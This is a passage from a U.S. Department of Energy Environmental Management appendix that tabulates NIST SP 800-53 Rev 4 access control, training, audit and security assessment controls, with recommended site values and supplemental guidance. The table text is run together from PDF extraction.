as much as practical.
________________________________________________________________________
DOE EM RMAIP37 of 266
Appendix A – NIST SP 800-53 Rev 4 Security Controls andGuidance
This table is a guide for tailoring and implementing the 800-53 Security Controls. Thetable has values/lists that the EM CSPM recommends be implemented by EM sites whereNIST has identified Control Requirements [Organizationally defined values/lists].Supplemental guidance is provided only for controls that historically have been difficultto define and for which it is difficult to determine appropriate mitigation action. The tableis to be used as a baseline and guide when determining site values/lists in accordancewith mission needs where NIST notes {organization-defined}and is not meant to betotally implemented as written. Contracting Officers are not to require that a contractorimplement each and every control listed in this table.
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-1
0 a 1Access Control Policy
and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:An access control policythat addresses purpose,scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
AC-1
0 a 2Access Control Policy
and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of theaccess control policy andassociated access controls;and
Security Staff andAdministrative Staff
AC-1
0 b 1Access Control Policy
and Procedures
The organization: Reviewsand updates the current:Access control policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
38 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-1
0 b 2Access Control Policy
and Procedures
The organization: Reviewsand updates the current:Access control procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
AC-2
0 a Account Management
The organization Identifiesand selects the followingtypes of information systemaccounts to supportorganizationalmissions/business functions:[Assignment: organization-defined information systemaccount types];
AC-2
0 b Account Management
The organization Assignsaccount managers forinformation systemaccounts;
AC-2
0 c Account ManagementThe organizationEstablishes conditions forgroup and role membership;
AC-2
0 d Account Management
The organization Specifiesauthorized users of theinformation system, groupand role membership, andaccess authorizations (i.e.,privileges) and otherattributes (as required) foreach account;
AC-2
0 e Account Management
The organization Requiresapprovals by [Assignment:organization-definedpersonnel or roles] forrequests to createinformation systemaccounts;
AC-2
0 f Account Management
The organization Creates,enables, modifies, disables,and removes informationsystem accounts inaccordance with[Assignment: organization-defined procedures orconditions];
AC-2
0 g Account ManagementThe organization Monitorsthe use of, informationsystem accounts;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
39 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-2
0 h 1 Account Management
The organization Notifiesaccount managers whenaccounts are no longerrequired;
AC-2
0 h 2 Account Management
The organization Notifiesaccount managers Whenusers are terminated ortransferred; and
AC-2
0 h 3 Account Management
The organization Notifiesaccount managers Whenindividual informationsystem usage or need-to-know changes;
AC-2
0 i 1 Account Management
The organization authorizesaccess to the informationsystem based on a validaccess authorization;
AC-2
0 i 2 Account Management
The organization authorizesaccess to the informationsystem based on Intendedsystem usage; and
AC-2
0 i 3 Account Management
The organization authorizesaccess to the informationsystem based on Otherattributes as required by theorganization or associatedmissions/business functions;
AC-2
0 j Account Management
Reviews accounts forcompliance with accountmanagement requirements[Assignment: organization-defined frequency]; and
Every 90 days
AC-2
0 k Account Management
Establishes a process forreissuing shared/groupaccount credentials (ifdeployed) when individualsare removed from the group.
AC-2
1Account Management- Automated System
Account Management
The organization employsautomated mechanisms tosupport the management ofinformation systemaccounts.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
40 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-2
2
Account Management- Removal of
Temporary/EmergencyAccounts
The information systemautomatically [Selection:removes; disables]temporary and emergencyaccounts after [Assignment:organization-defined timeperiod for each type ofaccount].
Disabled immediatelyat the conclusion of the
activity that requiredthe account but notlonger than after 30
days
AC-2
3Account Management
- Disable InactiveAccounts
The information systemautomatically disablesinactive accounts after[Assignment: organizationdefined time period].
Immediately at theconclusion of the
activity that requiredthe account and notlonger than after 30
days
AC-2
4Account Management
- Automated AuditActions
The information systemautomatically audits accountcreation, modification,enabling, disabling, andremoval actions, andnotifies [Assignment:organization-definedpersonnel or roles].
AC-3
0 Access Enforcement
The information systemenforces approvedauthorizations for logicalaccess to information andsystem resources inaccordance with applicableaccess control policies.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
41 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-4
0Information Flow
Enforcement
The information systemenforces approvedauthorizations forcontrolling the flow ofinformation within thesystem and betweeninterconnected systemsbased on [Assignment:organization-definedinformation flow controlpolicies].
Information flow controlregulates where informationis allowed to travel within aninformation system andbetween information systems(as opposed to who isallowed to access theinformation) and withoutexplicit regard to subsequentaccesses to that information.A few examples of flowcontrol restrictions include:keeping export controlledinformation from beingtransmitted in the clear to theInternet, blocking outsidetraffic that claims to be fromwithin the organization andnot passing any web requeststo the Internet that are notfrom the internal web proxy.Information flow controlpolicies and enforcementmechanisms are commonlyemployed by organizations tocontrol the flow ofinformation betweendesignated sources anddestinations (e.g., networks,individuals, devices) withininformation systems andbetween interconnectedsystems.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
42 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-5
0 a Separation of Duties
The organization: Separates[Assignment: organization-defined duties ofindividuals];
Examples of separation ofduties include: (i) missionfunctions and distinctinformation system supportfunctions are divided amongdifferent individuals/roles;(ii) different individualsperform information systemsupport functions (e.g.,system management, systemsprogramming, configurationmanagement, qualityassurance and testing,network security); (iii)security personnel whoadminister access controlfunctions do not administeraudit functions; and (iv)different administratoraccounts for different roles.
AC-5
0 b Separation of DutiesThe organization:Documents separation ofduties of individuals; and
AC-5
0 c Separation of Duties
The organization: Definesinformation system accessauthorizations to supportseparation of duties.
AC-6
0 Least Privilege
The organization employsthe principle of leastprivilege, allowing onlyauthorized accesses forusers (or processes acting onbehalf of users) which arenecessary to accomplishassigned tasks in accordancewith organizational missionsand business functions.
System admin (root)System admin (limited)
Network admin(firewalls, routers, etc.)
Security admin(monitoring tools)
Physical access admin(NSS) Removable
media admin (NSS)
One or two individualsshould not be able to havelogical or physical access tokey system components sothat their actions would beundetectable by others.
AC-6
1 Least Privilege
The organization explicitlyauthorizes access to[Assignment: organization-defined security functions(deployed in hardware,software, and firmware) andsecurity-relevantinformation].
Security functions: (a)access to any security
related deviceconfiguration options;or (b) configuration
items set and controlledby network or system
defined criteria
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
43 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-6
2 Least Privilege
The organization requiresthat users of informationsystem accounts, or roles,with access to [Assignment:organization-definedsecurity functions orsecurity-relevantinformation], use non-privileged accounts or roles,when accessing non-securityfunctions.
Security functions: (a)access to any security
related deviceconfiguration options;or (b) Configuration
items set and controlledby network or system
defined criteria
AC-6
5 Least Privilege
The organization restrictsprivileged accounts on theinformation system to[Assignment: organization-defined personnel or roles].
AC-6
9 Least PrivilegeThe information systemaudits the execution ofprivileged functions.
AC-6
10 Least Privilege
The information systemprevents non-privilegedusers from executingprivileged functions includedisabling, circumventing, oraltering implementedsecuritysafeguards/countermeasures.
AC-7
0 aUnsuccessful Login
Attempts
The information system:Enforces a limit of[Assignment: organization-defined number]consecutive invalid logonattempts by a user during a[Assignment: organization-defined time period]; and
3 attempts & 1 hour
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
44 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-7
0 bUnsuccessful Login
Attempts
The information system:Automatically [Selection:locks the account/node foran [Assignment:organization-defined timeperiod]; locks theaccount/node until releasedby an administrator; delaysnext logon promptaccording to [Assignment:organization-defined delayalgorithm]] when themaximum number ofunsuccessful attempts isexceeded.
Until released by anadministrator
AC-8
0 a 1System UseNotification
The information system:Displays to users[Assignment: organization-defined system usenotification message orbanner] before grantingaccess to the system thatprovides privacy andsecurity notices consistentwith applicable federal laws,Executive Orders,directives, policies,regulations, standards, andguidance and states that:Users are accessing a U.S.Government informationsystem;
AC-8
0 a 2System UseNotification
The information system:Displays to users[Assignment: organization-defined system usenotification message orbanner] before grantingaccess to the system thatprovides privacy andsecurity notices consistentwith applicable federal laws,Executive Orders,directives, policies,regulations, standards, andguidance and states that:Information system usagemay be monitored, recorded,and subject to audit;
DOE approved banner
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
45 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-8
0 a 3System UseNotification
The information system:Displays to users[Assignment: organization-defined system usenotification message orbanner] before grantingaccess to the system thatprovides privacy andsecurity notices consistentwith applicable federal laws,Executive Orders,directives, policies,regulations, standards, andguidance and states that:Unauthorized use of theinformation system isprohibited and subject tocriminal and civil penalties;and
AC-8
0 a 4System UseNotification
The information system:Displays to users[Assignment: organization-defined system usenotification message orbanner] before grantingaccess to the system thatprovides privacy andsecurity notices consistentwith applicable federal laws,Executive Orders,directives, policies,regulations, standards, andguidance and states that:Use of the informationsystem indicates consent tomonitoring and recording;
AC-8
0 bSystem UseNotification
The information system:Retains the notificationmessage or banner on thescreen until usersacknowledge the usageconditions and take explicitactions to log on to orfurther access theinformation system; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
46 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-8
0 c 1System UseNotification
The information system: Forpublicly accessible systems:Displays system useinformation [Assignment:organization-definedconditions], before grantingfurther access;
AC-8
0 c 2System UseNotification
The information system: Forpublicly accessible systems:Displays references, if any,to monitoring, recording, orauditing that are consistentwith privacyaccommodations for suchsystems that generallyprohibit those activities; and
AC-8
0 c 3System UseNotification
The information system: Forpublicly accessible systems:Includes a description of theauthorized uses of thesystem.
AC-11
0 a Session Lock
The information systemprevents further access tothe system by initiating asession lock after[Assignment: organization-defined time period] ofinactivity or upon receivinga request from a user; and
15 minutes
AC-11
0 b Session Lock
The information systemRetains the session lockuntil the user reestablishesaccess using establishedidentification andauthentication procedures.
AC-11
1 Session Lock
The information systemconceals, via the sessionlock, information previouslyvisible on the display with apublicly viewable image.
AC-12
0 Session Termination
The information systemautomatically terminates auser session after[Assignment: organization-defined conditions or triggerevents requiring sessiondisconnect].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
47 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-14
0 aPermitted Actions
without Identificationor Authentication
The organization Identifies[Assignment: organization-defined user actions] thatcan be performed on theinformation system withoutidentification orauthentication consistentwith organizationalmissions/business functions;and
AC-14
0 bPermitted Actions
without Identificationor Authentication
The organization documentsand provides supportingrationale in the security planfor the information system,user actions not requiringidentification andauthentication.
AC-17
0 a Remote Access
The organization establishesand documents usagerestrictions,configuration/connectionrequirements, andimplementation guidancefor each type of remoteaccess allowed; and
AC-17
0 b Remote Access
The organization authorizesremote access to theinformation system prior toallowing such connections.
AC-17
1 Remote AccessThe information systemmonitors and controlsremote access methods.
AC-17
2 Remote Access
The information systemimplements cryptographicmechanisms to protect theconfidentiality and integrityof remote access sessions.
AC-17
3 Remote Access
The information systemroutes all remote accessesthrough [Assignment:organization-definednumber] managed networkaccess control points.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
48 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-17
4 a Remote Access
The organization Authorizesthe execution of privilegedcommands and access tosecurity-relevantinformation via remoteaccess only for[Assignment: organization-defined needs]; and
Authorized privilegedusers performing timesensitive or emergency
activities
AC-17
4 b Remote Access
The organizationDocuments the rationale forsuch access in the securityplan for the informationsystem.
AC-18
0 a Wireless Access
The organizationEstablishes usagerestrictions,configuration/connectionrequirements, andimplementation guidancefor wireless access; and
Wireless technologiesinclude, but are not limitedto, microwave, satellite,packet radio (UHF/VHF),802.11x, and Bluetooth.
AC-18
0 b Wireless Access
The organization Authorizeswireless access to theinformation system prior toallowing such connections.
AC-18
1 Wireless Access
The information systemprotects wireless access tothe system usingauthentication of [Selection(one or more): users;devices] and encryption.
AC-19
0 aAccess Control for
Mobile Devices
The organizationEstablishes usagerestrictions, configurationrequirements, connectionrequirements, andimplementation guidancefor organization-controlledmobile devices; and
Mobile devices includeportable storage media (e.g.,USB memory sticks, externalhard disk drives) and portablecomputing andcommunications devices withinformation storagecapability (e.g.,notebook/laptop computers,personal digital assistants,cellular telephones, digitalcameras, and audio recordingdevices).
AC-19
0 bAccess Control for
Mobile Devices
The organization Authorizesthe connection of mobiledevices to organizationalinformation systems.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
49 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-19
5Access Control for
Mobile Devices
The organization employs[Selection: full-deviceencryption; containerencryption] to protect theconfidentiality and integrityof information on[Assignment: organization-defined mobile devices].
Full disk encryption onlaptops and external orremovable hard drivesnot physically secured
AC-20
0 aUse of External
Information Systems
The organization establishesterms and conditions,consistent with any trustrelationships establishedwith other organizationsowning, operating, and/ormaintaining externalinformation systems,allowing authorizedindividuals to: Access theinformation system from theexternal informationsystems; and
External information systemsare information systems orcomponents of informationsystems that are outside ofthe authorization boundaryestablished by theorganization and for whichthe organization typically hasno direct supervision andauthority over the applicationof required security controlsor the assessment of securitycontrol effectiveness.
AC-20
0 bUse of External
Information Systems
The organization establishesterms and conditions,consistent with any trustrelationships establishedwith other organizationsowning, operating, and/ormaintaining externalinformation systems,allowing authorizedindividuals to: Process,store, and/or transmitorganization-controlledinformation using theexternal informationsystems.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
50 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-20
1 aUse of External
Information Systems
The organization permitsauthorized individuals touse an external informationsystem to access theinformation system or toprocess, store, or transmitorganization-controlledinformation only when theorganization: Verifies theimplementation of requiredsecurity controls on theexternal system as specifiedin the organization’sinformation security policyand security plan; or
AC-20
1 bUse of External
Information Systems
The organization permitsauthorized individuals touse an external informationsystem to access theinformation system or toprocess, store, or transmitorganization-controlledinformation only when theorganization: Retainsapproved informationsystem connection orprocessing agreements withthe organizational entityhosting the externalinformation system.
AC-20
2Use of External
Information Systems
The organization [Selection:restricts; prohibits] the useof organization-controlledportable storage devices byauthorized individuals onexternal informationsystems.
AC-22
0 aPublicly Accessible
Content
The organization designatesindividuals authorized topost information onto apublicly accessibleinformation system;
AC-22
0 bPublicly Accessible
Content
The organization Trainsauthorized individuals toensure that publiclyaccessible information doesnot contain nonpublicinformation;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
51 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AC-22
0 cPublicly Accessible
Content
The organization Reviewsthe proposed content ofinformation prior to postingonto the publicly accessibleinformation system toensure that nonpublicinformation is not included;and
AC-22
0 dPublicly Accessible
Content
The organization Reviewsthe content on the publiclyaccessible informationsystem for nonpublicinformation [Assignment:organization-definedfrequency] and removessuch information, ifdiscovered.
Monthly
AT-1
0 a 1Security Awarenessand Training Policy
and Procedures
The organization Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A security awareness andtraining policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
AT-1
0 a 2Security Awarenessand Training Policy
and Procedures
The organization Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thesecurity awareness andtraining policy andassociated securityawareness and trainingcontrols; and
Security Staff andAdministrative Staff
AT-1
0 b 1Security Awarenessand Training Policy
and Procedures
Reviews and updates thecurrent Security awarenessand training policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
52 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AT-1
0 b 2Security Awarenessand Training Policy
and Procedures
Reviews the current securityawareness and trainingprocedures [Assignment:organization-definedfrequency].
Annually or any timethere is a major change
AT-2
0 aSecurity Awareness
Training
The organization providesbasic security awarenesstraining to informationsystem users (includingmanagers, senior executives,and contractors): As part ofinitial training for newusers;
AT-2
0 bSecurity Awareness
Training
The organization providesbasic security awarenesstraining to informationsystem users (includingmanagers, senior executives,and contractors): Whenrequired by informationsystem changes; and
AT-2
0 cSecurity Awareness
Training
The organization providesbasic security awarenesstraining to informationsystem users (includingmanagers, senior executives,and contractors):[Assignment: organization-defined frequency]thereafter.
Annually
AT-2
2 Security Awareness
The organization includessecurity awareness trainingon recognizing andreporting potentialindicators of insider threat.
AT-3
0 aRole-Based Security
Training
The organization providesrole-based security trainingto personnel with assignedsecurity roles andresponsibilities: Beforeauthorizing access to theinformation system orperforming assigned duties;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
53 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AT-3
0 bRole-Based Security
Training
The organization providesrole-based security trainingto personnel with assignedsecurity roles andresponsibilities: Whenrequired by informationsystem changes; and
AT-3
0 cRole-Based Security
Training
The organization providesrole-based security trainingto personnel with assignedsecurity roles andresponsibilities:[Assignment: organization-defined frequency]thereafter.
Annually
AT-4
0 aSecurity Training
Records
The organizationDocuments and monitorsindividual informationsystem security trainingactivities including basicsecurity awareness trainingand specific informationsystem security training;and
AT-4
0 bSecurity Training
Records
The organization Retainsindividual training recordsfor [Assignment:organization-defined timeperiod].
Retains individualtraining records for at
least five years or whensuperseded or obsolete,
whichever is sooner
AU-1
0 a 1
Audit andAccountability
Policies andProcedures
Develops, documents, anddisseminates to[Assignment: organization-defined personnel or roles]:An audit and accountabilitypolicy that addressespurpose, scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
54 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AU-1
0 a 2
Audit andAccountability
Policies andProcedures
Develops, documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of the auditand accountability policyand associated audit andaccountability controls; and
Security Staff andAdministrative Staff
AU-1
0 b 1
Audit andAccountability
Policies andProcedures
Reviews and updates thecurrent: Audit andaccountability policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
AU-1
0 b 2
Audit andAccountability
Policies andProcedures
Reviews and updates thecurrent: Audit andaccountability procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
AU-2
0 a Audit Events
The organization:Determines that theinformation system iscapable of auditing thefollowing events:[Assignment: organization-defined auditable events];
Successful andunsuccessful logon
events to the networkor any device; Logoff
events; Change ofpassword; Startup,
reboot, and any systemcommand event; All
actions by systemadministrator accounts;Startup and shutdown
of audit function;Clearing of any logfile; Successful and
unsuccessful changesto user/group accounts
and permissions;Successful and
unsuccessful changesto the configuration ofthe auditing subsystem;
Successful andunsuccessful changesto the configuration orpolicy of any device
The purpose of this control isfor the organization toidentify events which need tobe auditable as significantand relevant to the security ofthe information system;giving an overall systemrequirement in order to meetongoing and specific auditneeds. To balance auditingrequirements with otherinformation system needs,this control also requiresidentifying that subset ofauditable events that are to beaudited at a given point intime.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
55 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AU-2
0 b Audit Events
Coordinates the securityaudit function with otherorganizational entitiesrequiring audit-relatedinformation to enhancemutual support and to helpguide the selection ofauditable events;
AU-2
0 c Audit Events
Provides a rationale for whythe auditable events aredeemed to be adequate tosupport after-the-factinvestigations of securityincidents; and
AU-2
0 d Audit Events
Determines that thefollowing events are to beaudited within theinformation system:[Assignment: organization-defined audited events (thesubset of the auditableevents defined in AU-2 a.)along with the frequency of(or situation requiring)auditing for each identifiedevent].
Successful andunsuccessful logon
events to the networkor any device; Logoff
events; Change ofpassword; Startup,
reboot, and any systemcommand event; All
actions by systemadministrator accounts;Startup and shutdown
of audit function;Clearing of any logfile; Successful and
unsuccessful changesto user/group accounts
and permissions;Successful and
unsuccessful changesto the configuration ofthe auditing subsystem;
Successful andunsuccessful changesto the configuration orpolicy of any device
AU-2
3 Audit Events
The organization reviewsand updates the auditedevents [Assignment:organization-definedfrequency].
Annually
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
56 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AU-3
0Content of Audit
Records
The information systemgenerates audit recordscontaining information thatestablishes what type ofevent occurred, when theevent occurred, where theevent occurred, the sourceof the event, the outcome ofthe event, and the identity ofany individuals or subjectsassociated with the event.
Audit record content thatmay be necessary to satisfythe requirement of thiscontrol, includes, forexample, time stamps, sourceand destination addresses,user/process identifiers, eventdescriptions, success/failindications, filenamesinvolved, and access controlor flow control rules invoked.
AU-3
1Content of Audit
Records
The information systemgenerates audit recordscontaining the followingadditional information:[Assignment: organization-defined additional, moredetailed information].
Any technicallyfeasible risk basedaudit information
AU-4
0Audit Storage
Capacity
The organization allocatesaudit record storage capacityin accordance with[Assignment: organization-defined audit record storagerequirements].
AU-5
0 aResponse to AuditProcessing Failures
The information system:Alerts [Assignment:organization-definedpersonnel or roles] in theevent of an audit processingfailure; and
Audit processing failuresinclude, for example,software/hardware errors,failures in the audit capturingmechanisms, and auditstorage capacity beingreached or exceeded.
AU-5
0 bResponse to AuditProcessing Failures
The information system:Takes the followingadditional actions:[Assignment: organization-defined actions to be taken(e.g., shut down informationsystem, overwrite oldestaudit records, stopgenerating audit records)].
As defined in theincident response planbased upon assessed
risks to the informationstored, processed and
transferred by theinformation system
technology/components
Audit logs should beautomatically stored in a logcorrelation solution or SIEMsolution to preventintentional destruction ofaudit logs and to allowoptions such as overwritingthe oldest audit records.
AU-6
0 aAudit Review,Analysis, and
Reporting
The organization: Reviewsand analyzes informationsystem audit records[Assignment: organization-defined frequency] forindications of [Assignment:organization-definedinappropriate or unusualactivity]; and
Weekly
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
57 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AU-6
0 bAudit Review,Analysis, and
Reporting
The organization: Reportsfindings to [Assignment:organization-definedpersonnel or roles].
AU-6
1Audit Review,Analysis and
Reporting
The organization employsautomated mechanisms tointegrate audit review,analysis, and reportingprocesses to supportorganizational processes forinvestigation and responseto suspicious activities.
AU-6
3Audit Review,Analysis and
Reporting
The organization analyzesand correlates audit recordsacross different repositoriesto gain organization-widesituational awareness.
AU-7
0 aAudit Reduction andReport Generation
The information systemprovides an audit reductionand report generationcapability that: Supports on-demand audit review,analysis, and reportingrequirements and after-the-fact investigations ofsecurity incidents; and
An audit reduction and reportgeneration capabilityprovides support for nearreal-time audit review,analysis, and reportingrequirements described inAU-6 and after-the factinvestigations of securityincidents. Audit reductionand reporting tools do notalter original audit records. Itis also a safeguard for leastprivilege to help protectagainst insider threat.
AU-7
0 bAudit Reduction andReport Generation
The information systemprovides an audit reductionand report generationcapability that: Does notalter the original content ortime ordering of auditrecords.
AU-7
1Audit Reduction andReport Generation
The information systemprovides the capability toprocess audit records forevents of interest based on[Assignment: organization-defined audit fields withinaudit records].
AU-8
0 a Time Stamps
The information system:Uses internal system clocksto generate time stamps foraudit records; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
58 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AU-8
0 b Time Stamps
The information system:Records time stamps foraudit records that can bemapped to CoordinatedUniversal Time (UTC) orGreenwich Mean Time(GMT) and meets[Assignment: organization-defined granularity of timemeasurement].
AU-8
1 a Time Stamps
The information system:Compares the internalinformation system clocks[Assignment: organization-defined frequency] with[Assignment: organization-defined authoritative timesource]; and
Daily & time.doe.gov
AU-8
b Time Stamps
The information system:Synchronizes the internalsystem clocks to theauthoritative time sourcewhen the time difference isgreater than [Assignment:organization-defined timeperiod].
Two minutes
A time frequency such asweekly or monthly may beused in lieu of a defined timeperiod.
AU-9
0Protection of Audit
Information
The information systemprotects audit informationand audit tools fromunauthorized access,modification, and deletion.
AU-9
4Protection of Audit
Information
The organization authorizesaccess to management ofaudit functionality to only[Assignment: organization-defined subset of privilegedusers].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
59 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
AU-11
0Audit Record
Retention
The organization retainsaudit records for[Assignment: organization-defined time periodconsistent with recordsretention policy] to providesupport for after-the-factinvestigations of securityincidents and to meetregulatory andorganizational informationretention requirements.
At least one year oruntil no longer neededfor legal, investigative,or evidence purposes
The organization retains auditrecords until it is determinedthat they are no longerneeded for administrative,legal, audit, or otheroperational purposes. Thisincludes, for example,retention and availability ofaudit records relative toFreedom of Information Act(FOIA) requests, subpoena,and law enforcement actions.Standard categorizations ofaudit records relative to suchtypes of actions and standardresponse processes for eachtype of action are developedand disseminated. TheNational Archives andRecords Administration(NARA) General RecordsSchedules (GRS) providefederal policy on recordretention.
AU-12
0 a Audit Generation
The information system:Provides audit recordgeneration capability for theauditable events defined inAU-2 a. at [Assignment:organization-definedinformation systemcomponents];
System componentsthat access any
security-related devicesincluding devices withnetwork defined and
controlled by networkor system defined
criteria
AU-12
0 b Audit Generation
The information system:Allows [Assignment:organization-definedpersonnel or roles] to selectwhich auditable events areto be audited by specificcomponents of theinformation system; and
AU-12
0 c Audit Generation
The information system:Generates audit records forthe events defined in AU-2d. with the content definedin AU-3.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
60 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CA-1
0 a 1
Security Assessmentand Authorization
Policies andProcedures
The organization Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A security assessment andauthorization policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
CA-1
0 a 2
Security Assessmentand Authorization
Policies andProcedures
The organization Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thesecurity assessment andauthorization policy andassociated securityassessment andauthorization controls; and
Security Staff andAdministrative Staff
CA-1
0 b 1
Security Assessmentand Authorization
Policies andProcedures
Reviews and updates thecurrent: Security assessmentand authorization policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
CA-1
0 b 2
Security Assessmentand Authorization
Policies andProcedures
Reviews and updates thecurrent: Security assessmentand authorizationprocedures [Assignment:organization-definedfrequency].
Annually or any timethere is a major change
CA-2
0 a 1 Security Assessments
The organization develops asecurity assessment planthat describes the scope ofthe assessment including: -Security controls andcontrol enhancements underassessment;
CA-2
0 a 2 Security Assessments
Assessment procedures tobe used to determinesecurity controleffectiveness; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
61 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CA-2
0 a 3 Security Assessments
Assessment environment,assessment team, andassessment roles andresponsibilities;
CA-2
0 b Security Assessments
Assesses the securitycontrols in the informationsystem [Assignment:organization-definedfrequency] to determine theextent to which the controlsare implemented correctly,operating as intended, andproducing the desiredoutcome with respect tomeeting the securityrequirements for the system;
The site performs aninitial ST&E toauthorize new
boundaries, performsannual continuous
monitoring assessmentsand re-issues
authorization annuallyor at least every threeyears (maximum) if
appropriate
Continuous monitoring is acombination of efforts, thetesting of 1/3 of the controlsby EM HQ, site assessmentsof site determined controls,site and enterprise securitymonitoring tools, phishingexercises and penetrationtesting efforts.
CA-2
0 c Security Assessments
Produces a securityassessment report thatdocuments the results of theassessment; and
CA-2
0 d Security Assessments
Provides the results of thesecurity control assessment,in writing, to [Assignment:organization-definedindividuals or roles].
CA-2
1 Security Assessments
The organization employsan independent assessor orassessment team with[Assignment: organization-defined level ofindependence] to conductsecurity controlassessments.
EM HQ provides this serviceto EM sites.
CA-3
0 aInformation System
Connections
The organization:Authorizes connectionsfrom the information systemto other information systemsthrough the use ofInterconnection SecurityAgreements;
This control applies todedicated connectionsbetween information systemsand does not apply totransitory, user-controlledconnections such as emailand website browsing.
CA-3
0 bInformation System
Connections
The organization:Documents, for eachconnection, the interfacecharacteristics, securityrequirements, and the natureof the informationcommunicated; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
62 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CA-3
0 cInformation System
Connections
